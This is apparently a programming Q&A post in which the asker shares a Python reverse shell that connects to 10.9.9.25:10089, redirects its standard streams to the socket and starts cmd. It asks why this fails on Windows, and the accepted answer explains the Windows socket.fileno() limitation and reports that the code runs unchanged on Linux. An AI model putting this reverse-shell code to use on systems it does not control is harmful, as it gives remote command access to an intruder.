# When I use os.dup2() on windows, I get an error: OSError: [Errno 9] Bad file descriptor

Tags: python, sockets

I want to get my windows shell on my server, I am using the following code.

```
import socket,os,subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.9.9.25',10089))

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)

p=subprocess.call(['cmd','/u']);
```

I am getting the error

```
OSError: [Errno 9] Bad file descriptor.
```

Answer (score 5, accepted):

If you've read the documentation about `socket.fileno()` you would know that this won't work in Windows, Quoting from [Python Documentation](https://docs.python.org/3/library/socket.html?highlight=socket#module-socket):

> `socket.fileno()`
>
> Return the socket’s file descriptor (a small integer). This is useful with select.select().
>
> **Under Windows the small integer returned by this method cannot be used where a file descriptor can be used (such as os.fdopen())**. Unix
> does not have this limitation.

**Note:**

I've tried your code in Ubuntu (Linux System) and it worked fine without any tweeking.